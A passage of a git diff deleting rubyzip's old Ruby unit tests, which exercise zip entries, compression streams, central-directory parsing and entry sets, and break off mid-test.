-  FILENAME_ARRAY = [ "f1", "f2", "f3", "f4", "f5", "f6"  ]
-
-  def setup
-    @dirIt = ZipFileSystem::ZipFsDirIterator.new(FILENAME_ARRAY)
-  end
-
-  def test_close
-    @dirIt.close
-    assert_raise(IOError, "closed directory") {
-      @dirIt.each { |e| p e }
-    }
-    assert_raise(IOError, "closed directory") {
-      @dirIt.read
-    }
-    assert_raise(IOError, "closed directory") {
-      @dirIt.rewind
-    }
-    assert_raise(IOError, "closed directory") {
-      @dirIt.seek(0)
-    }
-    assert_raise(IOError, "closed directory") {
-      @dirIt.tell
-    }
-    
-  end
-
-  def test_each 
-    # Tested through Enumerable.entries
-    assert_equal(FILENAME_ARRAY, @dirIt.entries)
-  end
-
-  def test_read
-    FILENAME_ARRAY.size.times {
-      |i|
-      assert_equal(FILENAME_ARRAY[i], @dirIt.read)
-    }
-  end
-
-  def test_rewind
-    @dirIt.read
-    @dirIt.read
-    assert_equal(FILENAME_ARRAY[2], @dirIt.read)
-    @dirIt.rewind
-    assert_equal(FILENAME_ARRAY[0], @dirIt.read)
-  end
-  
-  def test_tell_seek
-    @dirIt.read
-    @dirIt.read
-    pos = @dirIt.tell
-    valAtPos = @dirIt.read
-    @dirIt.read
-    @dirIt.seek(pos)
-    assert_equal(valAtPos, @dirIt.read)
-  end
-
-end
-
-
-# Copyright (C) 2002, 2003 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
diff --git a/lib/zip/test/ziprequiretest.rb b/lib/zip/test/ziprequiretest.rb
deleted file mode 100755
index 68d2c714ed..0000000000
--- a/lib/zip/test/ziprequiretest.rb
+++ /dev/null
@@ -1,43 +0,0 @@
-#!/usr/bin/env ruby
-
-$VERBOSE = true
-
-$: << "../lib"
-
-require 'test/unit'
-require 'zip/ziprequire'
-
-$: << 'data/rubycode.zip' << 'data/rubycode2.zip'
-
-class ZipRequireTest < Test::Unit::TestCase
-  def test_require
-    assert(require('data/notzippedruby'))
-    assert(!require('data/notzippedruby'))
-
-    assert(require('zippedruby1'))
-    assert(!require('zippedruby1'))
-
-    assert(require('zippedruby2'))
-    assert(!require('zippedruby2'))
-
-    assert(require('zippedruby3'))
-    assert(!require('zippedruby3'))
-
-    c1 = NotZippedRuby.new
-    assert(c1.returnTrue)
-    assert(ZippedRuby1.returnTrue)
-    assert(!ZippedRuby2.returnFalse)
-    assert_equal(4, ZippedRuby3.multiplyValues(2, 2))
-  end
-
-  def test_get_resource
-    get_resource("aResource.txt") {
-      |f|
-      assert_equal("Nothing exciting in this file!", f.read)
-    }
-  end
-end
-
-# Copyright (C) 2002 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
diff --git a/lib/zip/test/ziptest.rb b/lib/zip/test/ziptest.rb
deleted file mode 100755
index aa07ffe848..0000000000
--- a/lib/zip/test/ziptest.rb
+++ /dev/null
@@ -1,1623 +0,0 @@
-#!/usr/bin/env ruby
-
-$VERBOSE = true
-
-$: << "../lib"
-
-require 'test/unit'
-require 'fileutils'
-require 'zip/zip'
-require 'gentestfiles'
-
-include Zip
-
-
-class ZipEntryTest < Test::Unit::TestCase
-  TEST_ZIPFILE = "someZipFile.zip"
-  TEST_COMMENT = "a comment"
-  TEST_COMPRESSED_SIZE = 1234
-  TEST_CRC = 325324
-  TEST_EXTRA = "Some data here"
-  TEST_COMPRESSIONMETHOD = ZipEntry::DEFLATED
-  TEST_NAME = "entry name"
-  TEST_SIZE = 8432
-  TEST_ISDIRECTORY = false
-
-  def test_constructorAndGetters
-    entry = ZipEntry.new(TEST_ZIPFILE,
-       TEST_NAME,
-       TEST_COMMENT,
-       TEST_EXTRA,
-       TEST_COMPRESSED_SIZE,
-       TEST_CRC,
-       TEST_COMPRESSIONMETHOD,
-       TEST_SIZE)
-
-    assert_equal(TEST_COMMENT, entry.comment)
-    assert_equal(TEST_COMPRESSED_SIZE, entry.compressed_size)
-    assert_equal(TEST_CRC, entry.crc)
-    assert_instance_of(Zip::ZipExtraField, entry.extra)
-    assert_equal(TEST_COMPRESSIONMETHOD, entry.compression_method)
-    assert_equal(TEST_NAME, entry.name)
-    assert_equal(TEST_SIZE, entry.size)
-    assert_equal(TEST_ISDIRECTORY, entry.is_directory)
-  end
-
-  def test_is_directoryAndIsFile
-    assert(ZipEntry.new(TEST_ZIPFILE, "hello").file?)
-    assert(! ZipEntry.new(TEST_ZIPFILE, "hello").directory?)
-
-    assert(ZipEntry.new(TEST_ZIPFILE, "dir/hello").file?)
-    assert(! ZipEntry.new(TEST_ZIPFILE, "dir/hello").directory?)
-
-    assert(ZipEntry.new(TEST_ZIPFILE, "hello/").directory?)
-    assert(! ZipEntry.new(TEST_ZIPFILE, "hello/").file?)
-
-    assert(ZipEntry.new(TEST_ZIPFILE, "dir/hello/").directory?)
-    assert(! ZipEntry.new(TEST_ZIPFILE, "dir/hello/").file?)
-  end
-
-  def test_equality
-    entry1 = ZipEntry.new("file.zip", "name",  "isNotCompared", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry2 = ZipEntry.new("file.zip", "name",  "isNotComparedXXX", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry3 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry4 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry5 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry6 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123, 
-        ZipEntry::DEFLATED, 10000)  
-    entry7 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123,  
-        ZipEntry::STORED,   10000)  
-    entry8 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123,  
-        ZipEntry::STORED,   100000)  
-
-    assert_equal(entry1, entry1)
-    assert_equal(entry1, entry2)
-
-    assert(entry2 != entry3)
-    assert(entry3 != entry4)
-    assert(entry4 != entry5)
-    assert(entry5 != entry6)
-    assert(entry6 != entry7)
-    assert(entry7 != entry8)
-
-    assert(entry7 != "hello")
-    assert(entry7 != 12)
-  end
-
-  def test_compare
-    assert_equal(0,  (ZipEntry.new("zf.zip", "a") <=> ZipEntry.new("zf.zip", "a")))
-    assert_equal(1, (ZipEntry.new("zf.zip", "b") <=> ZipEntry.new("zf.zip", "a")))
-    assert_equal(-1,  (ZipEntry.new("zf.zip", "a") <=> ZipEntry.new("zf.zip", "b")))
-
-    entries = [ 
-      ZipEntry.new("zf.zip", "5"),
-      ZipEntry.new("zf.zip", "1"),
-      ZipEntry.new("zf.zip", "3"),
-      ZipEntry.new("zf.zip", "4"),
-      ZipEntry.new("zf.zip", "0"),
-      ZipEntry.new("zf.zip", "2")
-    ]
-
-    entries.sort!
-    assert_equal("0", entries[0].to_s)
-    assert_equal("1", entries[1].to_s)
-    assert_equal("2", entries[2].to_s)
-    assert_equal("3", entries[3].to_s)
-    assert_equal("4", entries[4].to_s)
-    assert_equal("5", entries[5].to_s)
-  end
-
-  def test_parentAsString
-    entry1 = ZipEntry.new("zf.zip", "aa")
-    entry2 = ZipEntry.new("zf.zip", "aa/")
-    entry3 = ZipEntry.new("zf.zip", "aa/bb")
-    entry4 = ZipEntry.new("zf.zip", "aa/bb/")
-    entry5 = ZipEntry.new("zf.zip", "aa/bb/cc")
-    entry6 = ZipEntry.new("zf.zip", "aa/bb/cc/")
-
-    assert_equal(nil, entry1.parent_as_string)
-    assert_equal(nil, entry2.parent_as_string)
-    assert_equal("aa/", entry3.parent_as_string)
-    assert_equal("aa/", entry4.parent_as_string)
-    assert_equal("aa/bb/", entry5.parent_as_string)
-    assert_equal("aa/bb/", entry6.parent_as_string)
-  end
-
-  def test_entry_name_cannot_start_with_slash
-    assert_raise(ZipEntryNameError) { ZipEntry.new("zf.zip", "/hej/der") }
-  end
-end
-
-module IOizeString
-  attr_reader :tell
-  
-  def read(count = nil)
-    @tell ||= 0
-    count = size unless count
-    retVal = slice(@tell, count)
-    @tell += count
-    return retVal
-  end
-
-  def seek(index, offset)
-    @tell ||= 0
-    case offset
-    when IO::SEEK_END
-      newPos = size + index
-    when IO::SEEK_SET
-      newPos = index
-    when IO::SEEK_CUR
-      newPos = @tell + index
-    else
-      raise "Error in test method IOizeString::seek"
-    end
-    if (newPos < 0 || newPos >= size)
-      raise Errno::EINVAL
-    else
-      @tell=newPos
-    end
-  end
-
-  def reset
-    @tell = 0
-  end
-end
-
-class ZipLocalEntryTest < Test::Unit::TestCase
-  def test_read_local_entryHeaderOfFirstTestZipEntry
-    File.open(TestZipFile::TEST_ZIP3.zip_name, "rb") {
-      |file|
-      entry = ZipEntry.read_local_entry(file)
-      
-      assert_equal("", entry.comment)
-      # Differs from windows and unix because of CR LF
-      # assert_equal(480, entry.compressed_size)
-      # assert_equal(0x2a27930f, entry.crc)
-      # extra field is 21 bytes long
-      # probably contains some unix attrutes or something
-      # disabled: assert_equal(nil, entry.extra)
-      assert_equal(ZipEntry::DEFLATED, entry.compression_method)
-      assert_equal(TestZipFile::TEST_ZIP3.entry_names[0], entry.name)
-      assert_equal(File.size(TestZipFile::TEST_ZIP3.entry_names[0]), entry.size)
-      assert(! entry.is_directory)
-    }
-  end
-
-  def test_readDateTime
-    File.open("data/rubycode.zip", "rb") {
-      |file|
-      entry = ZipEntry.read_local_entry(file)
-      assert_equal("zippedruby1.rb", entry.name)
-      assert_equal(Time.at(1019261638), entry.time)
-    }
-  end
-
-  def test_read_local_entryFromNonZipFile
-    File.open("data/file2.txt") {
-      |file|
-      assert_equal(nil, ZipEntry.read_local_entry(file))
-    }
-  end
-
-  def test_read_local_entryFromTruncatedZipFile
-    zipFragment=""
-    File.open(TestZipFile::TEST_ZIP2.zip_name) { |f| zipFragment = f.read(12) } # local header is at least 30 bytes
-    zipFragment.extend(IOizeString).reset
-    entry = ZipEntry.new
-    entry.read_local_entry(zipFragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-  def test_writeEntry
-    entry = ZipEntry.new("file.zip", "entryName", "my little comment", 
-       "thisIsSomeExtraInformation", 100, 987654, 
-       ZipEntry::DEFLATED, 400)
-    write_to_file("localEntryHeader.bin", "centralEntryHeader.bin",  entry)
-    entryReadLocal, entryReadCentral = read_from_file("localEntryHeader.bin", "centralEntryHeader.bin")
-    compare_local_entry_headers(entry, entryReadLocal)
-    compare_c_dir_entry_headers(entry, entryReadCentral)
-  end
-  
-  private
-  def compare_local_entry_headers(entry1, entry2)
-    assert_equal(entry1.compressed_size   , entry2.compressed_size)
-    assert_equal(entry1.crc              , entry2.crc)
-    assert_equal(entry1.extra            , entry2.extra)
-    assert_equal(entry1.compression_method, entry2.compression_method)
-    assert_equal(entry1.name             , entry2.name)
-    assert_equal(entry1.size             , entry2.size)
-    assert_equal(entry1.localHeaderOffset, entry2.localHeaderOffset)
-  end
-
-  def compare_c_dir_entry_headers(entry1, entry2)
-    compare_local_entry_headers(entry1, entry2)
-    assert_equal(entry1.comment, entry2.comment)
-  end
-
-  def write_to_file(localFileName, centralFileName, entry)
-    File.open(localFileName,   "wb") { |f| entry.write_local_entry(f) }
-    File.open(centralFileName, "wb") { |f| entry.write_c_dir_entry(f)  }
-  end
-
-  def read_from_file(localFileName, centralFileName)
-    localEntry = nil
-    cdirEntry  = nil
-    File.open(localFileName,   "rb") { |f| localEntry = ZipEntry.read_local_entry(f) }
-    File.open(centralFileName, "rb") { |f| cdirEntry  = ZipEntry.read_c_dir_entry(f) }
-    return [localEntry, cdirEntry]
-  end
-end
-
-
-module DecompressorTests
-  # expects @refText, @refLines and @decompressor
-
-  TEST_FILE="data/file1.txt"
-
-  def setup
-    @refText=""
-    File.open(TEST_FILE) { |f| @refText = f.read }
-    @refLines = @refText.split($/)
-  end
-
-  def test_readEverything
-    assert_equal(@refText, @decompressor.sysread)
-  end
-    
-  def test_readInChunks
-    chunkSize = 5
-    while (decompressedChunk = @decompressor.sysread(chunkSize))
-      assert_equal(@refText.slice!(0, chunkSize), decompressedChunk)
-    end
-    assert_equal(0, @refText.size)
-  end
-
-  def test_mixingReadsAndProduceInput
-    # Just some preconditions to make sure we have enough data for this test
-    assert(@refText.length > 1000)
-    assert(@refLines.length > 40)
-
-    
-    assert_equal(@refText[0...100], @decompressor.sysread(100))
-
-    assert(! @decompressor.input_finished?)
-    buf = @decompressor.produce_input
-    assert_equal(@refText[100...(100+buf.length)], buf)
-  end
-end
-
-class InflaterTest < Test::Unit::TestCase
-  include DecompressorTests
-
-  def setup
-    super
-    @file = File.new("data/file1.txt.deflatedData", "rb")
-    @decompressor = Inflater.new(@file)
-  end
-
-  def teardown
-    @file.close
-  end
-end
-
-
-class PassThruDecompressorTest < Test::Unit::TestCase
-  include DecompressorTests
-  def setup
-    super
-    @file = File.new(TEST_FILE)
-    @decompressor = PassThruDecompressor.new(@file, File.size(TEST_FILE))
-  end
-
-  def teardown
-    @file.close
-  end
-end
-
- 
-module AssertEntry
-  def assert_next_entry(filename, zis)
-    assert_entry(filename, zis, zis.get_next_entry.name)
-  end
-
-  def assert_entry(filename, zis, entryName)
-    assert_equal(filename, entryName)
-    assert_entryContentsForStream(filename, zis, entryName)
-  end
-
-  def assert_entryContentsForStream(filename, zis, entryName)
-    File.open(filename, "rb") {
-      |file|
-      expected = file.read
-      actual   = zis.read
-      if (expected != actual)
-  if ((expected && actual) && (expected.length > 400 || actual.length > 400))
-    zipEntryFilename=entryName+".zipEntry"
-    File.open(zipEntryFilename, "wb") { |f| f << actual }
-    fail("File '#{filename}' is different from '#{zipEntryFilename}'")
-  else
-    assert_equal(expected, actual)
-  end
-      end
-    }
-  end
-
-  def AssertEntry.assert_contents(filename, aString)
-    fileContents = ""
-    File.open(filename, "rb") { |f| fileContents = f.read }
-    if (fileContents != aString)
-      if (fileContents.length > 400 || aString.length > 400)
-  stringFile = filename + ".other"
-  File.open(stringFile, "wb") { |f| f << aString }
-  fail("File '#{filename}' is different from contents of string stored in '#{stringFile}'")
-      else
-  assert_equal(fileContents, aString)
-      end
-    end
-  end
-
-  def assert_stream_contents(zis, testZipFile)
-    assert(zis != nil)
-    testZipFile.entry_names.each {
-      |entryName|
-      assert_next_entry(entryName, zis)
-    }
-    assert_equal(nil, zis.get_next_entry)
-  end
-
-  def assert_test_zip_contents(testZipFile)
-    ZipInputStream.open(testZipFile.zip_name) {
-      |zis|
-      assert_stream_contents(zis, testZipFile)
-    }
-  end
-
-  def assert_entryContents(zipFile, entryName, filename = entryName.to_s)
-    zis = zipFile.get_input_stream(entryName)
-    assert_entryContentsForStream(filename, zis, entryName)
-  ensure 
-    zis.close if zis
-  end
-end
-
-
-
-class ZipInputStreamTest < Test::Unit::TestCase
-  include AssertEntry
-
-  def test_new
-    zis = ZipInputStream.new(TestZipFile::TEST_ZIP2.zip_name)
-    assert_stream_contents(zis, TestZipFile::TEST_ZIP2)
-    assert_equal(true, zis.eof?)
-    zis.close    
-  end
-
-  def test_openWithBlock
-    ZipInputStream.open(TestZipFile::TEST_ZIP2.zip_name) {
-      |zis|
-      assert_stream_contents(zis, TestZipFile::TEST_ZIP2)
-      assert_equal(true, zis.eof?)
-    }
-  end
-
-  def test_openWithoutBlock
-    zis = ZipInputStream.open(TestZipFile::TEST_ZIP2.zip_name)
-    assert_stream_contents(zis, TestZipFile::TEST_ZIP2)
-  end
-
-  def test_incompleteReads
-    ZipInputStream.open(TestZipFile::TEST_ZIP2.zip_name) {
-      |zis|
-      entry = zis.get_next_entry # longAscii.txt
-      assert_equal(false, zis.eof?)
-      assert_equal(TestZipFile::TEST_ZIP2.entry_names[0], entry.name)
-      assert zis.gets.length > 0
-      assert_equal(false, zis.eof?)
-      entry = zis.get_next_entry # empty.txt
-      assert_equal(TestZipFile::TEST_ZIP2.entry_names[1], entry.name)
-      assert_equal(0, entry.size)
-      assert_equal(nil, zis.gets)
-      assert_equal(true, zis.eof?)
-      entry = zis.get_next_entry # empty_chmod640.txt
-      assert_equal(TestZipFile::TEST_ZIP2.entry_names[2], entry.name)
-      assert_equal(0, entry.size)
-      assert_equal(nil, zis.gets)
-      assert_equal(true, zis.eof?)
-      entry = zis.get_next_entry # short.txt
-      assert_equal(TestZipFile::TEST_ZIP2.entry_names[3], entry.name)
-      assert zis.gets.length > 0
-      entry = zis.get_next_entry # longBinary.bin
-      assert_equal(TestZipFile::TEST_ZIP2.entry_names[4], entry.name)
-      assert zis.gets.length > 0
-    }
-  end
-
-  def test_rewind
-    ZipInputStream.open(TestZipFile::TEST_ZIP2.zip_name) {
-      |zis|
-      e = zis.get_next_entry
-      assert_equal(TestZipFile::TEST_ZIP2.entry_names[0], e.name)
-
-      # Do a little reading
-      buf = ""
-      buf << zis.read(100)
-      buf << (zis.gets || "")
-      buf << (zis.gets || "")
-      assert_equal(false, zis.eof?)
-
-      zis.rewind
-
-      buf2 = ""
-      buf2 << zis.read(100)
-      buf2 << (zis.gets || "")
-      buf2 << (zis.gets || "")
-
-      assert_equal(buf, buf2)
-
-      zis.rewind
-      assert_equal(false, zis.eof?)
-
-      assert_entry(e.name, zis, e.name)
-    }
-  end
-
-  def test_mix_read_and_gets
-    ZipInputStream.open(TestZipFile::TEST_ZIP2.zip_name) {
-      |zis|
-      e = zis.get_next_entry
-      assert_equal("#!/usr/bin/env ruby", zis.gets.chomp)
-      assert_equal(false, zis.eof?)
-      assert_equal("", zis.gets.chomp)
-      assert_equal(false, zis.eof?)
-      assert_equal("$VERBOSE =", zis.read(10))
-      assert_equal(false, zis.eof?)
-    }
-  end
-  
-end
-
-
-module CrcTest
-
-  class TestOutputStream
-    include IOExtras::AbstractOutputStream
-
-    attr_accessor :buffer
-
-    def initialize
-      @buffer = ""
-    end
-
-    def << (data)
-      @buffer << data
-      self
-    end
-  end
-
-  def run_crc_test(compressorClass)
-    str = "Here's a nice little text to compute the crc for! Ho hum, it is nice nice nice nice indeed."
-    fakeOut = TestOutputStream.new
-    
-    deflater = compressorClass.new(fakeOut)
-    deflater << str
-    assert_equal(0x919920fc, deflater.crc)
-  end
-end
-
-
-
-class PassThruCompressorTest < Test::Unit::TestCase
-  include CrcTest
-
-  def test_size
-    File.open("dummy.txt", "wb") {
-      |file|
-      compressor = PassThruCompressor.new(file)
-      
-      assert_equal(0, compressor.size)
-      
-      t1 = "hello world"
-      t2 = ""
-      t3 = "bingo"
-      
-      compressor << t1
-      assert_equal(compressor.size, t1.size)
-      
-      compressor << t2
-      assert_equal(compressor.size, t1.size + t2.size)
-      
-      compressor << t3
-      assert_equal(compressor.size, t1.size + t2.size + t3.size)
-    }
-  end
-
-  def test_crc
-    run_crc_test(PassThruCompressor)
-  end
-end
-
-class DeflaterTest < Test::Unit::TestCase
-  include CrcTest
-
-  def test_outputOperator
-    txt = load_file("data/file2.txt")
-    deflate(txt, "deflatertest.bin")
-    inflatedTxt = inflate("deflatertest.bin")
-    assert_equal(txt, inflatedTxt)
-  end
-
-  private
-  def load_file(fileName)
-    txt = nil
-    File.open(fileName, "rb") { |f| txt = f.read }
-  end
-
-  def deflate(data, fileName)
-    File.open(fileName, "wb") {
-      |file|
-      deflater = Deflater.new(file)
-      deflater << data
-      deflater.finish
-      assert_equal(deflater.size, data.size)
-      file << "trailing data for zlib with -MAX_WBITS"
-    }
-  end
-
-  def inflate(fileName)
-    txt = nil
-    File.open(fileName, "rb") {
-      |file|
-      inflater = Inflater.new(file)
-      txt = inflater.sysread
-    }
-  end
-
-  def test_crc
-    run_crc_test(Deflater)
-  end
-end
-
-class ZipOutputStreamTest < Test::Unit::TestCase
-  include AssertEntry
-
-  TEST_ZIP = TestZipFile::TEST_ZIP2.clone
-  TEST_ZIP.zip_name = "output.zip"
-
-  def test_new
-    zos = ZipOutputStream.new(TEST_ZIP.zip_name)
-    zos.comment = TEST_ZIP.comment
-    write_test_zip(zos)
-    zos.close
-    assert_test_zip_contents(TEST_ZIP)
-  end
-
-  def test_open
-    ZipOutputStream.open(TEST_ZIP.zip_name) {
-      |zos|
-      zos.comment = TEST_ZIP.comment
-      write_test_zip(zos)
-    }
-    assert_test_zip_contents(TEST_ZIP)
-  end
-
-  def test_writingToClosedStream
-    assert_i_o_error_in_closed_stream { |zos| zos << "hello world" }
-    assert_i_o_error_in_closed_stream { |zos| zos.puts "hello world" }
-    assert_i_o_error_in_closed_stream { |zos| zos.write "hello world" }
-  end
-
-  def test_cannotOpenFile
-    name = TestFiles::EMPTY_TEST_DIR
-    begin
-      zos = ZipOutputStream.open(name)
-    rescue Exception
-      assert($!.kind_of?(Errno::EISDIR) || # Linux 
-       $!.kind_of?(Errno::EEXIST) || # Windows/cygwin
-       $!.kind_of?(Errno::EACCES),   # Windows
-        "Expected Errno::EISDIR (or on win/cygwin: Errno::EEXIST), but was: #{$!.class}")
-    end
-  end
-
-  def test_put_next_entry
-    stored_text = "hello world in stored text"
-    entry_name = "file1"
-    comment = "my comment"
-    ZipOutputStream.open(TEST_ZIP.zip_name) do
-      |zos|
-      zos.put_next_entry(entry_name, comment, nil, ZipEntry::STORED)
-      zos << stored_text
-    end
-
-  fdata = File.read(TEST_ZIP.zip_name)
-  if fdata.respond_to? :force_encoding
-    fdata.force_encoding("binary")
-  end
-    assert(fdata.split("\n").grep(stored_text))
-    ZipFile.open(TEST_ZIP.zip_name) do
-      |zf|
-      assert_equal(stored_text, zf.read(entry_name))
-    end
-  end
-
-  def assert_i_o_error_in_closed_stream
-    assert_raise(IOError) {
-      zos = ZipOutputStream.new("test_putOnClosedStream.zip")
-      zos.close
-      yield zos
-    }
-  end
-
-  def write_test_zip(zos)
-    TEST_ZIP.entry_names.each {
-      |entryName|
-      zos.put_next_entry(entryName)
-      File.open(entryName, "rb") { |f| zos.write(f.read) }
-    }
-  end
-end
-
-
-
-module Enumerable
-  def compare_enumerables(otherEnumerable)
-    otherAsArray = otherEnumerable.to_a
-    index=0
-    each_with_index {
-      |element, i|
-      return false unless yield(element, otherAsArray[i])
-    }
-    return index+1 == otherAsArray.size
-  end
-end
-
-
-class ZipCentralDirectoryEntryTest < Test::Unit::TestCase
-
-  def test_read_from_stream
-    File.open("data/testDirectory.bin", "rb") {
-      |file|
-      entry = ZipEntry.read_c_dir_entry(file)
-      
-      assert_equal("longAscii.txt", entry.name)
-      assert_equal(ZipEntry::DEFLATED, entry.compression_method)
-      assert_equal(106490, entry.size)
-      assert_equal(3784, entry.compressed_size)
-      assert_equal(0xfcd1799c, entry.crc)
-      assert_equal("", entry.comment)
-
-      entry = ZipEntry.read_c_dir_entry(file)
-      assert_equal("empty.txt", entry.name)
-      assert_equal(ZipEntry::STORED, entry.compression_method)
-      assert_equal(0, entry.size)
-      assert_equal(0, entry.compressed_size)
-      assert_equal(0x0, entry.crc)
-      assert_equal("", entry.comment)
-
-      entry = ZipEntry.read_c_dir_entry(file)
-      assert_equal("short.txt", entry.name)
-      assert_equal(ZipEntry::STORED, entry.compression_method)
-      assert_equal(6, entry.size)
-      assert_equal(6, entry.compressed_size)
-      assert_equal(0xbb76fe69, entry.crc)
-      assert_equal("", entry.comment)
-
-      entry = ZipEntry.read_c_dir_entry(file)
-      assert_equal("longBinary.bin", entry.name)
-      assert_equal(ZipEntry::DEFLATED, entry.compression_method)
-      assert_equal(1000024, entry.size)
-      assert_equal(70847, entry.compressed_size)
-      assert_equal(0x10da7d59, entry.crc)
-      assert_equal("", entry.comment)
-
-      entry = ZipEntry.read_c_dir_entry(file)
-      assert_equal(nil, entry)
-# Fields that are not check by this test:
-#          version made by                 2 bytes
-#          version needed to extract       2 bytes
-#          general purpose bit flag        2 bytes
-#          last mod file time              2 bytes
-#          last mod file date              2 bytes
-#          compressed size                 4 bytes
-#          uncompressed size               4 bytes
-#          disk number start               2 bytes
-#          internal file attributes        2 bytes
-#          external file attributes        4 bytes
-#          relative offset of local header 4 bytes
-
-#          file name (variable size)
-#          extra field (variable size)
-#          file comment (variable size)
-
-    }
-  end
-
-  def test_ReadEntryFromTruncatedZipFile
-    fragment=""
-    File.open("data/testDirectory.bin") { |f| fragment = f.read(12) } # cdir entry header is at least 46 bytes
-    fragment.extend(IOizeString)
-    entry = ZipEntry.new
-    entry.read_c_dir_entry(fragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-end
-
-
-class ZipEntrySetTest < Test::Unit::TestCase
-  ZIP_ENTRIES = [ 
-    ZipEntry.new("zipfile.zip", "name1", "comment1"),
-    ZipEntry.new("zipfile.zip", "name2", "comment1"),
-    ZipEntry.new("zipfile.zip", "name3", "comment1"),
-    ZipEntry.new("zipfile.zip", "name4", "comment1"),
-    ZipEntry.new("zipfile.zip", "name5", "comment1"),
-    ZipEntry.new("zipfile.zip", "name6", "comment1")
-  ]
-
-  def setup
-    @zipEntrySet = ZipEntrySet.new(ZIP_ENTRIES)
-  end
-
-  def test_include
-    assert(@zipEntrySet.include?(ZIP_ENTRIES.first))
-    assert(! @zipEntrySet.include?(ZipEntry.new("different.zip", "different", "aComment")))
-  end
-
-  def test_size
-    assert_equal(ZIP_ENTRIES.size, @zipEntrySet.size)
-    assert_equal(ZIP_ENTRIES.size, @zipEntrySet.length)
-    @zipEntrySet << ZipEntry.new("a", "b", "c")
-    assert_equal(ZIP_ENTRIES.size + 1, @zipEntrySet.length)
-  end
-
-  def test_add
-    zes = ZipEntrySet.new
-    entry1 = ZipEntry.new("zf.zip", "name1")
-    entry2 = ZipEntry.new("zf.zip", "name2")
-    zes << entry1
-    assert(zes.include?(entry1))
-    zes.push(entry2)
-    assert(zes.include?(entry2))
-  end
-
-  def test_delete
-    assert_equal(ZIP_ENTRIES.size, @zipEntrySet.size)
-    entry = @zipEntrySet.delete(ZIP_ENTRIES.first)
-    assert_equal(ZIP_ENTRIES.size - 1, @zipEntrySet.size)
-    assert_equal(ZIP_ENTRIES.first, entry)
-
-    entry = @zipEntrySet.delete(ZIP_ENTRIES.first)
-    assert_equal(ZIP_ENTRIES.size - 1, @zipEntrySet.size)
-    assert_nil(entry)
-  end
-
-  def test_each
-    # Tested indirectly via each_with_index
-    count = 0
-    @zipEntrySet.each_with_index { 
-      |entry, index|
-      assert(ZIP_ENTRIES.include?(entry))
-      count = count.succ
-    }
-    assert_equal(ZIP_ENTRIES.size, count)
-  end
-
-  def test_entries
-    assert_equal(ZIP_ENTRIES.sort, @zipEntrySet.entries.sort)
-  end
-
-  def test_compound
-    newEntry = ZipEntry.new("zf.zip", "new entry", "new entry's comment")
-    assert_equal(ZIP_ENTRIES.size, @zipEntrySet.size)
-    @zipEntrySet << newEntry
-    assert_equal(ZIP_ENTRIES.size + 1, @zipEntrySet.size)
-    assert(@zipEntrySet.include?(newEntry))
-
-    @zipEntrySet.delete(newEntry)
-    assert_equal(ZIP_ENTRIES.size, @zipEntrySet.size)
-  end
-
-  def test_dup
-    copy = @zipEntrySet.dup
-    assert_equal(@zipEntrySet, copy)
-
-    # demonstrate that this is a deep copy
-    copy.entries[0].name = "a totally different name"
-    assert(@zipEntrySet != copy)
-  end
-
-  def test_parent
-    entries = [ 
-      ZipEntry.new("zf.zip", "a"),
-      ZipEntry.new("zf.zip", "a/"),
-      ZipEntry.new("zf.zip", "a/b"),
-      ZipEntry.new("zf.zip", "a/b/"),
-      ZipEntry.new("zf.zip", "a/b/c"),
-      ZipEntry.new("zf.zip", "a/b/c/")
-    ]
-    entrySet = ZipEntrySet.new(entries)
-    
-    assert_equal(nil, entrySet.parent(entries[0]))
-    assert_equal(nil, entrySet.parent(entries[1]))
-    assert_equal(entries[1], entrySet.parent(entries[2]))
-    assert_equal(entries[1], entrySet.parent(entries[3]))
-    assert_equal(entries[3], entrySet.parent(entries[4]))
-    assert_equal(entries[3], entrySet.parent(entries[5]))
-  end
-
-  def test_glob
-    res = @zipEntrySet.glob('name[2-4]')
-    assert_equal(3, res.size)
-    assert_equal(ZIP_ENTRIES[1,3], res)
-  end
-
-  def test_glob2
-    entries = [ 
-      ZipEntry.new("zf.zip", "a/"),
-      ZipEntry.new("zf.zip", "a/b/b1"),
-      ZipEntry.new("zf.zip", "a/b/c/"),
-      ZipEntry.new("zf.zip", "a/b/c/c1")
-    ]
-    entrySet = ZipEntrySet.new(entries)
-
-    assert_equal(entries[0,1], entrySet.glob("*"))
-#    assert_equal(entries[FIXME], entrySet.glob("**"))
-#    res = entrySet.glob('a*')
-#    assert_equal(entries.size, res.size)
-#    assert_equal(entrySet.map { |e| e.name }, res.map { |e| e.name })
-  end
-end
-
-
-class ZipCentralDirectoryTest < Test::Unit::TestCase
-
-  def test_read_from_stream
-    File.open(TestZipFile::TEST_ZIP2.zip_name, "rb") {
-      |zipFile|
-      cdir = ZipCentralDirectory.read_from_stream(zipFile)
-      assert_equal(TestZipFile::TEST_ZIP2.entry_names.size, cdir.size)
-      cdir.entries.sort.compare_enumerables(TestZipFile::TEST_ZIP2.entry_names.sort) { 
-          |cdirEntry, testEntryName|
-          assert(cdirEntry.name == testEntryName)
-        }
-      assert_equal(TestZipFile::TEST_ZIP2.comment, cdir.comment)
-    }
-  end
-
-  def test_readFromInvalidStream
-    File.open("data/file2.txt", "rb") {
-      |zipFile|
-      cdir = ZipCentralDirectory.new
-      cdir.read_from_stream(zipFile)
-    }
-    fail "ZipError expected!"
-  rescue ZipError
-  end
-
-  def test_ReadFromTruncatedZipFile
-    fragment=""
-    File.open("data/testDirectory.bin") { |f| fragment = f.read }
